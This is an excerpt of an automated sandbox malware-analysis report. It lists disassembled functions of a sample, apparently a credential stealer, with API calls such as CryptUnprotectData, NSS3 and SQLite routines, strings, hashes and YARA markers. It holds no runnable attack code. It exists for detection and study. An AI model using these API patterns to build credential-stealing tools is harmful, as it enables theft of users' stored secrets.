sqlite3_free.NSS3(?,?,00000002,?,6CECCF46,?,6CD9CDBD,?,6CECBF31,?,?,?,?,?,?,?), ref: 6CDAB115
sqlite3_free.NSS3(?,?,?,?,?,?,6CECCF46,?,6CD9CDBD,?,6CECBF31), ref: 6CDAB12D

Part of subcall function 6CD99EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CDAC6FD,?,?,?,?,6CDFF965,00000000), ref: 6CD99F0E
Part of subcall function 6CD99EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CDFF965,00000000), ref: 6CD99F5D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 17a228566c6094fa6542ae096fbd2e15d911f90584773d01cc3bb90d92685295
Instruction ID: 45c0331e8eaffa9b0929f364c23b6d1dcd1a94cd75b1c6f29b1d57f37f5db66d
Opcode Fuzzy Hash: 17a228566c6094fa6542ae096fbd2e15d911f90584773d01cc3bb90d92685295
Instruction Fuzzy Hash: 7B91BFB1A04205CFDB15CFA5D884B7AB7F1BF49304F14462EE45A97AA0E731E846CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAEFB0 Relevance: 13.3, Strings: 10, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6CDAF957, 6CDAF9BA
there is already an index named %s, xrefs: 6CDAF9D7
5s/, xrefs: 6CDAEFD8
table, xrefs: 6CDAF05C, 6CDAFABC, 6CDAFAC7
authorizer malfunction, xrefs: 6CDAF95C, 6CDAF9BF, 6CDAFA5E, 6CDAFA8B
sqlite_master, xrefs: 6CDAF0AB, 6CDAF2DA, 6CDAF757, 6CDAF93E
view, xrefs: 6CDAF061, 6CDAF071, 6CDAFAB7
%s %T already exists, xrefs: 6CDAFAC8
temporary table name must be unqualified, xrefs: 6CDAF734
sqlite_temp_master, xrefs: 6CDAF0A6, 6CDAF2D5

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view$5s/
API String ID: 3168844106-791773787
Opcode ID: 29e214f61b5beeb202b63c0715d7d05304c764336840f3dc4cb708b4c3929261
Instruction ID: c0eb689ec915d160133aeb6fc0fa5393d53475a54e31335cc294eb97d9027cc2
Opcode Fuzzy Hash: 29e214f61b5beeb202b63c0715d7d05304c764336840f3dc4cb708b4c3929261
Instruction Fuzzy Hash: 76726F70E04205CFDB14CFA9C484BAABBF1FF49308F1581AAD8559B762D775E846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF28D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CF714E4,6CEDCC70), ref: 6CF28D47
PR_GetCurrentThread.NSS3 ref: 6CF28D98

Part of subcall function 6CE00F00: PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B
Part of subcall function 6CE00F00: PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CF28E7B
htons.WSOCK32(?), ref: 6CF28EDB
PR_GetCurrentThread.NSS3 ref: 6CF28F99
PR_GetCurrentThread.NSS3 ref: 6CF2910A

Strings

%u.%u.%u.%u, xrefs: 6CF28E74

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 94df57a64b221e4255cf762b93670e51789fbf9d82df95b1c252013c0626d79f
Instruction ID: e2c08059eaeac16dd6e0b98842eb87e8b842fc53da13224ae6e3ae52da5a3978
Opcode Fuzzy Hash: 94df57a64b221e4255cf762b93670e51789fbf9d82df95b1c252013c0626d79f
Instruction Fuzzy Hash: 2C028B329052518FDB18CF9AC4687A6BBB2EF42304F1A825EDC915FBD1C739DA49C790

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6CEA68FC
PR_EnterMonitor.NSS3 ref: 6CEA6924

Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED90AB
Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED90C9
Part of subcall function 6CED9090: EnterCriticalSection.KERNEL32 ref: 6CED90E5
Part of subcall function 6CED9090: TlsGetValue.KERNEL32 ref: 6CED9116
Part of subcall function 6CED9090: LeaveCriticalSection.KERNEL32 ref: 6CED913F

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

PR_EnterMonitor.NSS3 ref: 6CEA693E
TlsGetValue.KERNEL32 ref: 6CEA6977
TlsGetValue.KERNEL32 ref: 6CEA69B8
PR_ExitMonitor.NSS3 ref: 6CEA6B1E
PR_ExitMonitor.NSS3 ref: 6CEA6B39
TlsGetValue.KERNEL32 ref: 6CEA6B62

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 2c6329181b317d905a317da51c8b582b74a6546962c2c871f7ba89f62ebbb2fa
Instruction ID: f97aa94ff00ec31c487fa2fea7a3d8d6bb65b71206283178efba71c0a5304f64
Opcode Fuzzy Hash: 2c6329181b317d905a317da51c8b582b74a6546962c2c871f7ba89f62ebbb2fa
Instruction Fuzzy Hash: B3916D74658210CFDB60DFADC48065D7BBAFB87308B728299C8449FA19C775D983CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE80E20 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CE81052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CE81086

Strings

5s/, xrefs: 6CE80E35
h(l, xrefs: 6CE81062, 6CE8105D, 6CE80F37, 6CE81081, 6CE81082
h(l, xrefs: 6CE80E55, 6CE80EC4, 6CE80F3A, 6CE80FA7

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpymemset
String ID: h(l$h(l$5s/
API String ID: 1297977491-2178139198
Opcode ID: 0405fd172f1098a25deb38df3ce3c6be9571be4ce6c96ca8ecb9efcd360273b6
Instruction ID: 70d0e0729fd7d3f1da486f87bcd1686405bb55b3ab1e58c2e797dec47006a42c
Opcode Fuzzy Hash: 0405fd172f1098a25deb38df3ce3c6be9571be4ce6c96ca8ecb9efcd360273b6
Instruction Fuzzy Hash: A9A14571F0225A9FDF08CF99C9909EEB7B5BF49314B248129E919A7700D735EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6CE24444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE24466

Part of subcall function 6CE71200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE71228
Part of subcall function 6CE71200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CE71238
Part of subcall function 6CE71200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7124B
Part of subcall function 6CE71200: PR_CallOnce.NSS3(6CF72AA4,6CE712D0,00000000,00000000,00000000,?,6CE188A4,00000000,00000000), ref: 6CE7125D
Part of subcall function 6CE71200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CE7126F
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CE71280
Part of subcall function 6CE71200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CE7128E
Part of subcall function 6CE71200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CE7129A
Part of subcall function 6CE71200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CE712A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE2447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE2448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE24494

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: 0c6c429d9565b671fca9bb3070db6c92f0445738614462bb66064ba4705dd057
Instruction ID: ad0f8308ed254742da708c503eeb59fe2688e5de7de9039e6b09f0dd886f181d
Opcode Fuzzy Hash: 0c6c429d9565b671fca9bb3070db6c92f0445738614462bb66064ba4705dd057
Instruction Fuzzy Hash: 7B11E7B2D107449BD7208F65DC80AA7B7F8FF5925C7144B3EE88E92A00F375B5988790

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF2D086
PR_Malloc.NSS3(00000001), ref: 6CF2D0B9
PR_Free.NSS3(?), ref: 6CF2D138

Strings

>, xrefs: 6CF2CF5B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: b8d246fbe0677e7103e5241d4b178fd09f4ff0ac385cdd39eb657e6ffd73eee7
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: AED14772B45A560BFB2448FC8CA13EAB7938B82374F684329D5619BFE5E61DC843C351

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA6F10 Relevance: 6.5, Strings: 5, Instructions: 218COMMON

Download Yara Rule

Strings

*?[, xrefs: 6CDA7034, 6CDA7052, 6CDA7070
unordered*, xrefs: 6CDA702B
5s/, xrefs: 6CDA6F1C
sz=[0-9]*, xrefs: 6CDA7049
noskipscan*, xrefs: 6CDA7067

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*$5s/
API String ID: 0-4066142491
Opcode ID: b4a5d735bee90b4ca1e90b0ea68186fdb6b269bafbeb9514d8de4255bd643529
Instruction ID: 14d43946fe9c67ce77a73cfc036bb58a1f7550892930fdab9b070312caf45d6d
Opcode Fuzzy Hash: b4a5d735bee90b4ca1e90b0ea68186fdb6b269bafbeb9514d8de4255bd643529
Instruction Fuzzy Hash: 07717C72F001119BEB108BEDC8803DE73E29F85314F260279C9A9ABBE9D6719C4787D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CECAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e406586a25654940869427c56afea3b0594d5d2033354016393e814a005ed25
Instruction ID: c0139e6910ad4fec5401f027303fd122ac01f73ff3b6163d4ca82b60b85595dc
Opcode Fuzzy Hash: 4e406586a25654940869427c56afea3b0594d5d2033354016393e814a005ed25
Instruction Fuzzy Hash: 2CF11172F112668FDB45CF29DA503B977F0AB8A308F25422DC825EB750E7709946CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDE64D0 Relevance: 4.5, Strings: 3, Instructions: 724COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6CDE6D47, 6CDE6D4C
5s/, xrefs: 6CDE64DB
authorizer malfunction, xrefs: 6CDE6E3E

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID:
String ID: authorizer malfunction$not authorized$5s/
API String ID: 0-2956712260
Opcode ID: cd49a0758bc518dafd3a6e5ea31db3a87a24501319e3662d7fb433e682302402
Instruction ID: 7275b4d84250878392e1779cb4988875a8100aed7ac1dfa812f503571517d13f
Opcode Fuzzy Hash: cd49a0758bc518dafd3a6e5ea31db3a87a24501319e3662d7fb433e682302402
Instruction Fuzzy Hash: 49628D70A04208CFDB14CF69C484AA9BBF2FF89308F1581ADD9159B766D736E917CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAAC60 Relevance: 3.9, Strings: 3, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6CDAAE18
5s/, xrefs: 6CDAAC72
winUnlockReadLock, xrefs: 6CDAAE9F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
